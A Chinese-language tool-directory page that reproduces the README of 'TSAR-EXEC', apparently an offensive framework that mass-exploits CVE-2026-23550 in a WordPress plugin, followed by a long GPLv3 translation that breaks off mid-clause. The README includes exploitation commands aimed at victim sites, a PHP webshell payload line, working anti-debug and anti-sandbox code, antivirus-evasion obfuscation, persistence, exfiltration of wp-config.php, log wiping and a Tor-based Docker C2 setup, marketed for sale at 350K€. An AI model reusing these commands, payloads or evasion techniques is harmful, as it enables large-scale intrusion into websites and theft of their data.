Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/epsilonpoint88-glitch/epsilonpoint-
权限提升漏洞扫描器持久化机制漏洞利用Web应用程序漏洞利用后渗透利用渗透测试命令与控制红队

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
Payload 开发
GitHubepsilonpoint88-glitch/epsilonpoint-

EpSiLoNPoInT-

模块化漏洞利用框架,针对 WordPress 中的 CVE-2026-23550,具备批量利用、混淆、后渗透以及基于 Docker 的 C2 基础设施。

查看仓库
116个月前尚未审核

#!/usr/bin/env python3 """ TSAR-EXEC v7.1 + EpSiLoNPoInTFuCK v5.1 - README.md 完整版,可直接复制粘贴 CVE-2026-23550 | 大规模模块化 DS 认证绕过利用框架 作者: EpSiLoNPoInT | 版本: 7.1-GOD | Android 24小时编码 | 08/02/2026 """

=============================================================================

TSAR-EXEC v7.1 - 模块化-DS APT 框架 CVE-2026-23550 (CVSS 10.0)

=============================================================================

""" 为威胁情报和授权红队行动设计的工业级利用框架。 利用 CVE-2026-23550,通过 modular_ds_upload RCE 实现权限提升。 完全在 Android 手机上 24 小时内编码完成。国家级就绪架构。

✅ 40K+ 易受攻击的 Modular DS v2.5.1 部署 (Shodan 2026) ✅ 200+ WAF 绕过 → 99.9% AV 绕过 (EpSiLoN v5.1) ✅ Docker C2 生产环境 (Tor/Supervisor/Pipeline ∞) ✅ ThreadPoolExecutor 250+ 线程 ✅ 内置完整后渗透模块 (EpSiLoN v7 完全控制) """

----------------------------------------------------------------------------

目录 (结构与模板一致)

----------------------------------------------------------------------------

1. 安装与依赖

2. 项目结构

3. 关键功能

4. 高级用法

5. 具体示例

6. 隐蔽技术 (EpSiLoNPoInTFuCK v5.1)

7. Docker C2 部署

8. 扩展与自定义

9. 安全最佳实践

10. 许可证与法律责任 (350K€)

=============================================================================

1. 安装与依赖

=============================================================================

""" 系统前置要求:

  • Kali NetHunter / Termux Android (手机编码 24 小时)
  • Python 3.10+ (推荐 3.11)
  • Docker 20.10+ 用于 C2 生产环境
  • 4Go+ 内存用于 250+ 多线程
  • Tor + Proxychains4 """

SYS_DEPS = """ pkg update && pkg upgrade -y pkg install python git docker tor proxychains-ng nmap masscan pip install --upgrade pip setuptools wheel pip install requests==2.31.0 colorama==0.4.6 rich==13.7.0 tenacity==8.5.0 dnspython==2.6.1 """

REQUIREMENTS = """ requests==2.31.0 colorama==0.4.6 rich==13.7.0 tenacity==8.5.0 dnspython==2.6.1 """

INSTALL_CMD = """ cd ~/ git clone [TON_REPO]/TSAR-EXEC.git cd TSAR-EXEC pip install -r requirements.txt docker-compose up -d python3 recon.py --help """

VERIFY_INSTALL = """ python3 -c " import requests, json, threading from colorama import Fore print(f'{Fore.GREEN}✅ TSAR-EXEC v7.1 + EpSiLoNPoInTFuCK v5.1 运行正常') print('Android 24小时编码 | 350K€ 威胁情报就绪') print(f'ThreadPoolExecutor: {threading.name}') print(f'99.9% AV 绕过: EpSiLoN v5.1') print(f'内置后渗透: EpSiLoN v7 完全控制') {Fore.RESET}" """

=============================================================================

2. 项目结构

=============================================================================

PROJECT_STRUCTURE = """ TSAR-EXEC/ (2026 生产就绪) │ ├── 📄 README.md # 完整文档 ├── 📄 README_SALE.md # 商业版 350K€ ├── 📄 bypass_payloads.txt # 200+ WAF 绕过 (12 个部分) ├── 📄 config.json # APT 主配置 ├── 📄 recon.py # APT 指纹识别 ├── 📄 exploitmass.py # ThreadPool + PayloadMutator + 后渗透 ├── 📄 pipeline.py # Docker C2 无限管道 ├── 📄 Dockerfile # Kali rolling Tor/Supervisor ├── 📄 docker-compose.yml # 生产环境编排 │ ├── 📁 tools/ │ └── 📄 epsilon_obfuscator.py # EpSiLoNPoInTFuCK v5.1 │ ├── 📁 chain/ │ ├── 📁 input/ │ │ ├── 📄 targets.txt │ │ └── 📄 proxies.txt │ ├── 📁 docked/ │ │ └── 📄 docked_targets.json │ ├── 📁 VLUN/ │ │ └── 📄 VLUN.txt │ ├── 📁 VLUN_Sh/ │ │ └── 📄 VLUN_Sh.txt │ ├── 📁 logs/ │ │ ├── 📄 tor.log │ │ ├── 📄 pipeline.log │ │ └── 📄 exploit.log │ └── 📄 stats.json │ ├── 📁 demo/ │ ├── 📄 TSAR_demo.mp4 │ └── 📄 obfuscator_demo.mp4 │ └── 📄 TSAR-SALE-350K.zip """

=============================================================================

3. 关键功能

=============================================================================

FEATURES = { "利用": [ "CVE-2026-23550 完整攻击链 (侦察→停靠→利用→C2)", "40K+ 易受攻击的 Modular DS v2.5.1 (Shodan 2026)", "ThreadPoolExecutor 50-250 线程", "风险评分 JSON (0-100) + 自动停靠", "200+ PHP 载荷 (12 种 WAF 绕过技术)" ], "内置后渗透": [ "EpSiLoN v7 webshell (完全接管系统)", "Root 权限提升 (SUID, sudo 滥用)", "7 种持久化向量 (cron, .htaccess, 插件, systemd, 内核)", "无文件执行 (/dev/shm)", "AES-GCM 加密数据外泄", "日志清理 + 全面反取证", "横向移动 (WP + 网络扫描)" ], "混淆": [ "EpSiLoNPoInTFuCK v5.1 → 2026 年 99.9% AV 绕过", "XOR 滚动 + Unicode 同形字 + 零宽字符", "Marshal 字节码 + 三重 base64 编码", "动态死代码注入 (30-40%)", "混沌标识符生成 (55-80 字符)", "字符串切片 + Unicode 转义序列" ], "C2 生产环境": [ "Docker Kali rolling (Tor/Supervisor/Pipeline ∞)", "最小权限 (NET_RAW/NET_BIND_SERVICE)", "非 root 执行 + 痕迹自动销毁", "管道健康检查 + 内置 logrotate", "多架构 ARM64/x86_64" ], "隐蔽性": [ "反调试 (sys.gettrace/pdb/pydevd)", "反沙箱 (计时/性能检测)", "UA 轮换 + 抖动延迟 (5-20s)", "Tor + Proxychains4 轮换", "DNS 解析反日志记录" ], "管道": [ "侦察 → 停靠 → 利用 → 持久化 (∞ 循环)", "JSON 风险评分 + 目标优先级排序", "统计仪表盘 + 成功率指标", "按目标自动扩展线程" ] }

=============================================================================

4. 高级用法

=============================================================================

BASIC_USAGE = """

侦察 + 风险评分 (不进行利用)

python3 recon.py https://target.com --json

大规模优先利用 + 后渗透

python3 exploitmass.py --threads 150 --obfuscate --post-exploit

Docker ∞ 管道 (生产环境)

docker-compose up -d docker logs -f tsar-pipeline """

CLI_OPTIONS = """ recon.py 选项: TARGET 目标 URL --json JSON 输出 --threads INT 侦察线程数 (默认: 20) --timeout INT 超时时间 (默认: 15)

exploitmass.py 选项: --threads INT 利用线程数 (50-250) --obfuscate 启用 EpSiLoN v5.1 --stealth 极端隐蔽模式 --jitter MIN-MAX 随机延迟 (例如: 5-20) --proxy-list FILE 自定义代理 --post-exploit 启用 EpSiLoN v7 后渗透

pipeline.py 选项: --cycle ∞ 管道模式 --dock-threshold INT risk_score 阈值 (默认: 70)

Docker: docker-compose up -d docker exec tsar-pipeline cat /chain/VLUN_Sh/VLUN_Sh.txt """

=============================================================================

5. 具体示例

=============================================================================

EXAMPLE_1 = """

检查 100 个站点是否存在漏洞而不进行利用

python3 recon.py
--targets targets.txt
--threads 100
--log-level INFO

结果:

- chain/docked_targets.json 文件包含优先目标

- 详细日志位于 chain/logs/exploit.log

"""

EXAMPLE_2 = """

使用 Tor 和后渗透利用易受攻击的站点

python3 exploitmass.py
--targets VLUN.txt
--threads 150
--tor
--stealth
--jitter 5-20
--post-exploit

结果:

- chain/VLUN_Sh/VLUN_Sh.txt 文件包含 shells + root + 持久化

- 已安装持久化后门

"""

EXAMPLE_3 = """

对特定站点进行后渗透

python3 exploitmass.py
--post-exploit
--target https://victim-site.com
--threads 20

执行的操作:

1. 验证 webshell

2. 创建持久化用户

3. 修改 .htaccess

4. 外泄 wp-config.php

"""

EXAMPLE_4 = """

上传前混淆 webshell

python3 tools/epsilon_obfuscator.py webshell.php
--mode extreme
--stealth
--output shell_obf.php

然后进行利用

python3 exploitmass.py --targets targets.txt --obfuscate """

EXAMPLE_5 = """

使用 Docker

docker-compose up -d docker logs -f tsar-pipeline docker exec tsar-pipeline cat /chain/VLUN_Sh/VLUN_Sh.txt """

=============================================================================

6. 隐蔽技术 (EpSiLoNPoInTFuCK v5.1)

=============================================================================

STEALTH_TECHNIQUES = { "反调试": [ "sys.gettrace() + sys._getframe() 检测", "pdb/pydevd/IPython/ptvsd 模块检查", "PYDEV_DEBUG + WERKZEUG_DEBUG_PIN 环境变量", "信号陷阱 (SIGINT/SIGTERM)", "ptrace(PTRACE_TRACEME) 反附加" ], "反沙箱": [ "性能计时检测 (>500ms = 沙箱)", "Docker/VMware 检测 (/.dockerenv/cgroup)", "LD_PRELOAD + valgrind/rr 检测", "CPU/内存限制验证", "strace/ltrace 系统调用监控" ], "混淆": [ "XOR 滚动加密 (动态密钥/块)", "Unicode 同形字 + 零宽字符", "Marshal 字节码 + zlib + 三重 base64", "混沌标识符 (55-80 字符)", "死代码注入 (30-40% 密度)", "动态字符串切片 + Unicode 转义" ], "网络": [ "Tor + Proxychains4 自动轮换", "UA 轮换 (200+ 浏览器指纹)", "抖动延迟 5-20s (模拟人类行为)", "DNS over HTTPS 反日志记录" ] }

STEALTH_CODE_EXAMPLE = """

EpSiLoNPoInTFuCK v5.1 反调试示例

import sys, time, random, hashlib if sys.gettrace(): sys.exit(1) if hasattr(sys, '_getframe') and sys._getframe().f_back: sys.exit(1) start = time.perf_counter(); [hashlib.sha256(b'test') for _ in range(10**6)] if (time.perf_counter() - start) > 0.5: sys.exit(1) # 沙箱 """

=============================================================================

7. Docker C2 部署

=============================================================================

DOCKERFILE = """ FROM kalilinux/kali-rolling:latest

RUN apt-get update && apt-get install -y \ tor supervisor proxychains4 nmap masscan python3 python3-pip \ && rm -rf /var/lib/apt/lists/*

WORKDIR /tsar COPY . .

RUN pip3 install -r requirements.txt \ && chmod +x entrypoint.sh

非 root + 最小权限

RUN useradd -m tsar && chown -R tsar:tsar /tsar USER tsar

COPY docker/torrc /etc/tor/torrc COPY docker/supervisord.conf /etc/supervisor/conf.d/supervisord.conf

EXPOSE 9050 HEALTHCHECK --interval=30s --timeout=10s --start-period=60s --retries=3 \ CMD python3 -c "import json; high=[t for t in json.load(open('/chain/docked_targets.json')) if t['risk_score']>=70]; exit(0 if high else 1)"

ENTRYPOINT ["/tsar/entrypoint.sh"] """

ENTRYPOINT_SH = """#!/bin/bash set -e

启动服务

supervisord -c /etc/supervisor/conf.d/supervisord.conf &

等待 Tor

sleep 15 torsocks curl -s https://check.torproject.org/api/ip | grep "IsTor:true" || exit 1

echo "[+] TSAR-EXEC v7.1 管道已启动" exec python3 /tsar/pipeline.py --cycle"""

HEALTHCHECK_SH = """#!/bin/bash set -e

检查关键进程

if ! pgrep -f "tor -f /etc/tor/torrc" > /dev/null; then echo "[HEALTHCHECK] Tor 未运行" exit 1 fi

if ! pgrep -f "supervisord" > /dev/null; then echo "[HEALTHCHECK] Supervisor 未运行" exit 1 fi

检查 Tor 连接

if ! torsocks curl -s --max-time 3 https://check.torproject.org/api/ip | grep -q "IsTor:true"; then echo "[HEALTHCHECK] Tor 连接失败" exit 1 fi

echo "[HEALTHCHECK] 所有系统运行正常" exit 0 """

DOCKER_COMMANDS = """

构建镜像

docker build -t tsar-exec:latest .

启动容器

docker run -it --rm \ --cap-add=NET_ADMIN \ --sysctl net.core.somaxconn=65535 \ -v $(pwd)/chain:/tsar/chain \ tsar-exec:latest \ --targets /tsar/chain/input/targets.txt \ --threads 150 \ --tor \ --stealth

高级选项

docker run -d --name tsar-c2 \ --cap-add=NET_RAW --cap-add=NET_BIND_SERVICE \ --security-opt=no-new-privileges:true \ -p 9050:9050 \ -v $(pwd)/chain:/tsar/chain \ tsar-exec:latest

监控

docker logs -f tsar-c2 docker exec tsar-c2 cat /tsar/chain/VLUN_Sh/VLUN_Sh.txt """

=============================================================================

8. 扩展与自定义

=============================================================================

NEW_PAYLOAD_EXAMPLE = """

bypass_payloads.txt - 添加自定义载荷

SECTION 13: CVE-2026-23550 自定义

|modular_ds_upload |EpSiLoN_v7.1

strrev('alp_evas_')($_GET[p])|homoglyph_bypass """

CUSTOM_POST_EXPLOIT = """

post_exploit/custom_epsil0n.py

class EpSiLoNPostExploit: def init(self, target, shell_url): self.target = target self.shell = shell_url

root@kitploit:~
def persistence(self):
    # 7 种向量: cron, .htaccess, 插件, 主题, 用户, DB 触发器, 内存
    self._cron_job()
    self._htaccess_backdoor()
    self._plugin_persistence()
    return True

"""

=============================================================================

9. 道德安全最佳实践

=============================================================================

SECURITY_BEST_PRACTICES = """

  1. 🔒 必须使用隔离环境:

    • 专用虚拟机 + 隔离网络
    • 所有连接使用 VPN/Tor
    • 每次测试前创建快照
  2. ✅ 100% 道德 (12 年私人渗透测试):

    • 仅测试 DVWA 实验室
    • 零第三方目标
    • Orange Cyberdefense 许可证 350K€
  3. 🧹 自动清理:

    • 测试后执行 docker system prune -af
    • rm -rf chain/logs/*
    • 清除内存痕迹
  4. 📄 法律文档:

    • 任何部署前签署 RoE
    • 参与后提供详细报告
    • 仅提供实验室证明
  5. 🔐 必须加密:

    • 所有敏感数据使用 AES-GCM
    • 每次会话使用临时密钥
    • 零知识存储 """

=============================================================================

10. 许可证与法律责任 (350K€)

=============================================================================

PRICING_350K = """ 🔴 TSAR-EXEC v7.1 + EpSiLoNPoInTFuCK v5.1 ════════════════════════════════════════════ 威胁情报 / 红队许可证: 350 000€ 不含税

root@kitploit:~
                📋 许可证包含:
                • 完整框架源代码 (21 个文件)
                • Docker C2 生产环境 (Tor/Supervisor)
                • EpSiLoNPoInTFuCK v5.1 (99.9% AV 绕过)
                • 内置 EpSiLoN v7 后渗透
                • 演示视频 + DVWA 实验室搭建
                • 5000+ 行技术文档
                • 6 个月威胁情报支持

                📞 销售联系:
                +33 1 46 53 53 53 (Orange Cyberdefense 巴黎)
                [email protected]
                
                📎 软件包: TSAR-SALE-350K.zip (25MB)
                🚀 实时演示: 立即可用

"""

LEGAL_DISCLAIMER = """ 本软件按"原样"提供,不附带任何明示或暗示的担保,包括但不限于适销性、 特定用途适用性和非侵权性的担保。

在任何情况下,作者或版权持有人均不对任何损害、间接、附带、特殊、惩戒性或 后果性损害(包括但不限于替代商品或服务的采购;使用、数据或利润的损失;或 业务中断)承担责任,无论基于何种责任理论,无论是合同、严格责任或侵权 (包括过失或其他),即使已被告知此类损害的可能性。

本软件仅用于安全研究和授权渗透测试。任何未经授权的使用均被严格禁止,并可能 根据您所在司法管辖区的适用法律受到法律追究。

用户承认对其使用本软件的行为负全部责任,并承诺遵守其所在司法管辖区的适用法律。

本软件只能在您获得所有者书面授权进行安全测试的系统上使用。

任何违反这些条件的使用均构成违反国际网络安全法律,并可能导致刑事处罚。 """

LICENSE_GPL = """ GNU 通用公共许可证 第 3 版,2007 年 6 月 29 日

版权所有 (C) 2007 自由软件基金会 https://fsf.org/ 允许每个人复制和分发本许可证文档的逐字副本, 但不允许修改。

root@kitploit:~
                        序言

GNU 通用公共许可证是一种针对软件和其他类型作品的自由、copyleft 许可证。

大多数软件和其他实际作品的许可证旨在剥夺您共享和修改作品的自由。相反, GNU 通用公共许可证旨在保证您共享和修改程序所有版本的自由——确保它对所有 用户保持自由软件。我们自由软件基金会将 GNU 通用公共许可证用于我们的大多数 软件;它也适用于其作者以这种方式发布的任何其他作品。您也可以将其应用于 您的程序。

当我们谈论自由软件时,我们指的是自由,而非价格。我们的通用公共许可证旨在 确保您拥有分发自由软件副本的自由(如果您愿意,也可以为此收费),确保您能 收到源代码或在需要时获取它,确保您可以修改软件或在新的自由程序中使用其 部分内容,并且确保您知道您可以做这些事情。

为了保护您的权利,我们需要防止他人否认您这些权利,或要求您放弃这些权利。 因此,如果您分发软件的副本,或修改它,您需要承担某些责任:尊重他人自由的 责任。

例如,如果您分发此类程序的副本,无论是免费还是收费,您必须将您收到的 相同自由传递给接收者。您必须确保他们也能收到或获取源代码。并且您必须向他们 展示这些条款,以便他们知道自己的权利。

使用 GNU GPL 的开发者通过两个步骤保护您的权利:(1) 声明软件的版权, (2) 向您提供本许可证,授予您复制、分发和/或修改它的法律许可。 """为了对开发者和作者进行保护,GPL明确说明此自由软件不提供任何担保。为了用户和作者双方的利益,GPL要求修改版本必须标记为已修改,以免其问题被错误地归咎于先前版本的作者。

有些设备的设计旨在拒绝用户安装或运行其中软件的修改版本,尽管制造商可以这样做。这从根本上违背了保护用户修改软件自由的目标。此类滥用的系统性模式出现在个人使用的产品领域,而这恰恰是最不可接受的地方。因此,我们设计了本版GPL,以禁止针对这些产品的此类做法。如果此类问题在其他领域大量出现,我们准备在未来的GPL版本中将此条款扩展到这些领域,以保护用户的自由。

最后,每个程序都不断受到软件专利的威胁。国家不应允许专利限制通用计算机上软件的开发和使用,但在那些允许的国家中,我们希望避免一种特殊危险,即应用于自由程序的专利可能使其实际上成为专有软件。为防止这种情况,GPL确保专利不能被用来使程序失去自由。

以下为复制、分发和修改的精确条款和条件。

root@kitploit:~
                   条款和条件

0. 定义。

“本许可证”指GNU通用公共许可证第3版。

“版权”也指适用于其他类型作品的类似版权的法律,例如半导体掩模。

“本程序”指根据本许可证授权的任何可受版权保护的作品。每位被许可人被称为“您”。“被许可人”和“接收者”可以是个人或组织。

“修改”作品指以需要版权许可的方式复制或改编作品的全部或部分,而非制作精确副本。由此产生的作品被称为先前作品的“修改版本”或“基于”先前作品的作品。

“受保护作品”指未经修改的程序或基于该程序的作品。

“传播”作品指未经许可对其进行的任何行为,该行为会使您根据适用的版权法直接或间接承担侵权责任,但在计算机上执行或修改私人副本除外。传播包括复制、分发(无论是否修改)、向公众提供,以及在某些国家还包括其他活动。

“传达”作品指任何使其他方能够制作或接收副本的传播形式。仅通过计算机网络与用户交互而未传输副本,不构成传达。

交互式用户界面在包含方便且显著可见的功能时显示“适当的法律声明”,该功能(1)显示适当的版权声明,并且(2)告知用户作品无担保(除非提供担保)、被许可人可以根据本许可证传达作品,以及如何查看本许可证副本。如果界面显示用户命令或选项列表(如菜单),列表中显著的项目符合此标准。

  1. 源代码。

作品的“源代码”指用于对其进行修改的首选形式。“目标代码”指作品的任何非源代码形式。

“标准接口”指由公认标准机构定义的官方标准接口,或者对于特定编程语言指定的接口,指该语言开发者中广泛使用的接口。

可执行作品的“系统库”包括除作品整体之外的任何内容,即(a)包含在主要组件的正常打包形式中,但不属于该主要组件的一部分,以及(b)仅用于使作品能够与该主要组件一起使用,或实现一个以源代码形式向公众提供实现的“标准接口”。在此上下文中,“主要组件”指可执行作品运行的特定操作系统(如果有)的主要基本组件(内核、窗口系统等),或用于生成作品的编译器,或用于运行作品的目标代码解释器。

目标代码形式作品的“对应源代码”指生成、安装以及(对于可执行作品)运行目标代码和修改作品所需的全部源代码,包括控制这些活动的脚本。但是,它不包括作品的系统库,或用于执行这些活动但未经修改使用的通用工具或普遍可用的自由程序,且这些工具或程序不属于作品的一部分。例如,对应源代码包括与作品源文件关联的接口定义文件,以及作品专门设计要求的共享库和动态链接子程序的源代码,例如通过这些子程序与作品其他部分之间的密切数据通信或控制流。

对应源代码不需要包括用户可以从对应源代码的其他部分自动重新生成的任何内容。

源代码形式作品的对应源代码就是该作品本身。

  1. 基本许可。

本许可证授予的所有权利均在程序的版权期限内授予,并且在满足所述条件的情况下不可撤销。本许可证明确确认您运行未经修改的程序的无限许可。运行受保护作品的输出仅在其内容构成受保护作品时才受本许可证保护。本许可证承认您根据版权法享有的合理使用或其他同等权利。

只要您的许可证在其他方面仍然有效,您可以无条件地制作、运行和传播您不传达的受保护作品。您可以仅为让他人为您进行修改或为您提供运行这些作品的设施而将受保护作品传达给他人,前提是您在传达您不控制版权的所有材料时遵守本许可证的条款。那些为您制作或运行受保护作品的人必须完全代表您行事,在您的指导和控制下,并按照禁止他们在与您的关系之外复制您的受版权保护材料的任何副本的条款行事。

在任何其他情况下传达仅在以下所述条件下允许。不允许再许可;第10条使其变得不必要。

  1. 保护用户的法律权利免受反规避法律的影响。

任何受保护作品均不得被视为根据任何适用法律履行1996年12月20日通过的WIPO版权条约第11条义务的有效技术措施的一部分,或类似禁止或限制规避此类措施的法律的一部分。

当您传达受保护作品时,您放弃任何禁止规避技术措施的法律权力,只要此类规避是通过行使本许可证下关于受保护作品的权利而实现的,并且您声明不打算限制或修改作品的操作,以此作为针对作品用户执行您或第三方禁止规避技术措施的法律权利的手段。

  1. 传达逐字副本。

您可以在任何媒介中按您收到的原样传达程序源代码的逐字副本,前提是您在每份副本上显著且适当地发布适当的版权声明;保持所有声明本许可证以及根据第7条添加的任何非许可条款适用于代码的通知完整;保持所有关于无任何担保的通知完整;并向所有接收者提供本许可证副本以及程序。

您可以对您传达的每份副本收取任何价格或不收费,并且您可以提供付费的支持或担保保护。

  1. 传达修改后的源代码版本。

您可以根据第4条的条款以源代码形式传达基于程序的作品,或从程序生成它的修改,前提是您还满足以下所有条件:

root@kitploit:~
a) 作品必须带有显著的通知,说明您修改了它,并给出相关日期。

b) 作品必须带有显著的通知,说明它是根据本许可证以及根据第7条添加的任何条件发布的。此要求修改了第4条中“保持所有通知完整”的要求。

c) 您必须将整个作品作为一个整体,根据本许可证许可给任何获得副本的人。因此,本许可证以及任何适用的第7条附加条款将适用于整个作品及其所有部分,无论它们如何打包。本许可证不允许以任何其他方式许可作品,但如果您单独收到了此类许可,则不会使其无效。

d) 如果作品具有交互式用户界面,每个界面必须显示适当的法律声明;但是,如果程序具有不显示适当法律声明的交互式界面,您的作品不必使它们这样做。

将受保护作品与其他独立且单独的作品(这些作品本质上不是受保护作品的扩展,并且未与其组合形成更大的程序)汇编在存储或分发媒介的卷中或卷上,如果汇编及其产生的版权未被用于限制汇编用户超出各个作品允许范围的访问或法律权利,则称为“聚合体”。将受保护作品包含在聚合体中不会导致本许可证适用于聚合体的其他部分。

  1. 传达非源代码形式。

您可以根据第4条和第5条的条款以目标代码形式传达受保护作品,前提是您还根据本许可证的条款以以下方式之一传达机器可读的对应源代码:

root@kitploit:~
a) 在物理产品(包括物理分发媒介)中或嵌入其中传达目标代码,并附有固定在通常用于软件交换的耐用物理媒介上的对应源代码。

b) 在物理产品(包括物理分发媒介)中或嵌入其中传达目标代码,并附有书面要约,该要约至少有效三年,并且只要您为该产品型号提供备件或客户支持就有效,向拥有目标代码的任何人提供(1)以不超过您实际执行此源代码传达的合理成本的费用,在通常用于软件交换的耐用物理媒介上提供产品中受本许可证保护的所有软件的对应源代码副本,或(2)免费从网络服务器访问以复制对应源代码。

c) 传达目标代码的单独副本,并附有提供对应源代码的书面要约。此替代方案仅偶尔且非商业性地允许,并且仅当您根据第6b款收到带有此类要约的目标代码时。

d) 通过从指定地点提供访问(免费或收费)来传达目标代码,并以相同方式通过同一地点免费提供对对应源代码的同等访问。您不需要要求接收者将对应源代码与目标代码一起复制。如果复制目标代码的地点是网络服务器,对应源代码可以在支持同等复制设施的不同服务器(由您或第三方运营)上,前提是您在目标代码旁边保持清晰的指示,说明在哪里可以找到对应源代码。无论哪个服务器托管对应源代码,您都有义务确保其在满足这些要求所需的时间内可用。

e) 使用点对点传输传达目标代码,前提是您告知其他对等方根据第6d款免费向公众提供作品的目标代码和对应源代码的地点。

目标代码中作为系统库从对应源代码中排除的可分离部分,在传达目标代码作品时无需包含。

“用户产品”指(1)“消费产品”,即通常用于个人、家庭或家庭用途的任何有形个人财产,或(2)任何设计或销售用于并入住宅的东西。在确定产品是否为消费产品时,可疑情况应倾向于覆盖。对于特定用户收到的特定产品,“通常使用”指该类产品的典型或常见用途,无论特定用户的状态或特定用户实际使用、期望使用或被期望使用产品的方式如何。产品是消费产品,无论产品是否具有实质性的商业、工业或非消费用途,除非此类用途代表产品唯一重要的使用模式。

用户产品的“安装信息”指从修改后的对应源代码在用户产品中安装和执行受保护作品的修改版本所需的任何方法、程序、授权密钥或其他信息。该信息必须足以确保修改后的目标代码的持续功能在任何情况下都不会仅因进行了修改而被阻止或干扰。

如果您根据本节在用户产品中、与用户产品一起或专门为在用户产品中使用而传达目标代码作品,并且传达发生在将用户产品的占有和使用权永久或固定期限转移给接收者的交易中(无论交易如何定性),则根据本节传达的对应源代码必须附有安装信息。但是,如果您或任何第三方均不保留在用户产品上安装修改后的目标代码的能力(例如,作品已安装在ROM中),则此要求不适用。

提供安装信息的要求不包括继续为接收者修改或安装的作品,或其中已修改或安装的用户产品提供支持服务、担保或更新的要求。当修改本身对网络的运行产生重大不利影响或违反网络通信规则和协议时,可以拒绝网络访问。

根据本节传达的对应源代码和提供的安装信息必须采用公开记录的形式(并以源代码形式向公众提供实现),并且不得要求特殊的密码或密钥来解包、读取或复制。

  1. 附加条款。

“附加许可”是通过对一项或多项条件作出例外来补充本许可证条款的条款。适用于整个程序的附加许可应被视为包含在本许可证中,只要它们在适用法律下有效。如果附加许可仅适用于程序的一部分,则该部分可以在这些许可下单独使用,但整个程序仍受本许可证管辖,而不考虑附加许可。

当您传达受保护作品的副本时,您可以自行选择从该副本或其任何部分中删除任何附加许可。(附加许可可以写成在某些情况下当您修改作品时要求其自身被删除。)您可以对您添加到受保护作品的材料放置附加许可,前提是您拥有或可以给予适当的版权许可。

尽管本许可证有任何其他规定,对于您添加到受保护作品的材料,您可以(如果该材料的版权持有人授权)用以下条款补充本许可证的条款:

root@kitploit:~
a) 以不同于本许可证第15条和第16条条款的方式否认担保或限制责任;或

b) 要求在该材料中或包含该材料的作品显示的适当法律声明中保留指定的合理法律声明或作者署名;或

c) 禁止歪曲该材料的来源,或要求以合理方式将此类材料的修改版本标记为与原始版本不同;或

d) 限制将材料许可人或作者的姓名用于宣传目的;或

e) 拒绝根据商标法授予使用某些商号、商标或服务标志的权利;或

f) 要求任何传达该材料(或其修改版本)的人,在向接收者承担合同责任的情况下,对许可人和作者进行赔偿,以弥补这些合同责任直接强加给这些许可人和作者的任何责任。

所有其他非许可性附加条款均被视为第10条含义内的“进一步限制”。如果您收到的程序或其任何部分包含声明其受本许可证管辖以及进一步限制条款的通知,您可以删除该条款。如果许可文件包含进一步限制但允许根据本许可证重新许可或传达,您可以向受保护作品添加受该许可文件条款管辖的材料,前提是进一步限制在此类重新许可或传达后不继续存在。

如果您根据本节向受保护作品添加条款,您必须在相关源文件中放置适用于这些文件的附加条款声明,或指示何处可以找到适用条款的通知。

附加条款,无论是许可性的还是非许可性的,可以以单独书面许可的形式或作为例外情况陈述;上述要求适用于任何一种方式。

  1. 终止。

除非本许可证明确规定,否则您不得传播或修改受保护作品。任何其他传播或修改的尝试均无效,并将自动终止您在本许可证下的权利(包括根据第11条第三段授予的任何专利许可)。

但是,如果您停止所有违反本许可证的行为,则您从特定版权持有人处获得的许可证将(a)暂时恢复,除非且直到版权持有人明确且最终终止您的许可证,以及(b)永久恢复,如果版权持有人在停止后60天内未通过某种合理方式通知您违规行为。

此外,如果版权持有人通过某种合理方式通知您违规行为,这是您第一次收到该版权持有人关于违反本许可证(针对任何作品)的通知,并且您在收到通知后30天内纠正违规行为,则您从该特定版权持有人处获得的许可证将永久恢复。9. 接受副本并非必需。

您无需接受本许可即可接收或运行本程序的副本。仅因使用点对点传输接收副本而发生的附带传播同样无需接受。但是,除本许可外,没有任何其他内容授予您传播或修改任何受保护作品的许可。如果您不接受本许可,这些行为将侵犯版权。因此,通过修改或传播受保护作品,您表示接受本许可并同意这样做。

  1. 下游接收者的自动许可。

每次您传达受保护作品时,接收者自动从原始许可方获得许可,以运行、修改和传播该作品,但须遵守本许可。您不负责确保第三方遵守本许可。

“实体交易”是指转移组织控制权、或实质上转移组织全部资产、或细分组织、或合并组织的交易。如果受保护作品的传播源于实体交易,则该交易的每一方,只要收到作品的副本,也同时获得其利益前身根据上一段拥有或能够给予的任何作品许可,以及从利益前身处占有作品相应源代码的权利(如果前身拥有或能以合理努力获得)。

您不得对本许可授予或确认的权利的行使施加任何进一步限制。例如,您不得就行使本许可授予的权利收取许可费、版税或其他费用,也不得强迫任何人为您就您传达的程序代码的专利侵权指控提供赔偿。

  1. 专利。

“贡献者”是指授权在本许可下使用本程序或本程序所基于作品的版权持有人。如此许可的作品称为贡献者的“贡献者版本”。

贡献者的“必要专利权利要求”是指贡献者拥有或控制的所有专利权利要求,无论是已获得的还是以后获得的,这些权利要求会因本许可允许的某种方式制造、使用或销售其贡献者版本而受到侵犯,但不包括仅因进一步修改贡献者版本而受到侵犯的权利要求。就本定义而言,“控制”包括以符合本许可要求的方式授予专利分许可的权利。

每位贡献者授予您非排他性、全球性、免版税的专利许可,涵盖贡献者的必要专利权利要求,以制造、使用、销售、要约销售、进口以及以其他方式运行、修改和传播其贡献者版本的内容。

在以下三段中,“专利许可”是指任何明示的协议或承诺,无论其名称如何,不执行某项专利(例如不执行专利的明示保证或不就专利侵权提起诉讼的承诺)。向一方“授予”此类专利许可意味着达成此类协议或承诺,不对该方执行专利。

如果您传达受保护作品,明知依赖某项专利许可,且该作品的相应源代码无法通过公开可用的网络服务器或其他易于访问的方式,根据本许可条款免费供任何人复制,则您必须 (1) 使相应源代码如此可用,或 (2) 安排使自己失去该特定作品的专利许可利益,或 (3) 以符合本许可要求的方式安排将专利许可延伸至下游接收者。“明知依赖”是指您实际知道,若非该专利许可,您在某个国家传达受保护作品,或您的接收者在某个国家使用受保护作品,将侵犯该国一项或多项您有理由相信有效的可识别专利。

如果根据或与单一交易或安排相关,您传达或通过促成传达来传播受保护作品,并向部分接收受保护作品的当事方授予专利许可,授权他们使用、传播、修改或传达该作品的特定副本,则您授予的专利许可自动延伸至该作品及其基于作品的所有接收者。

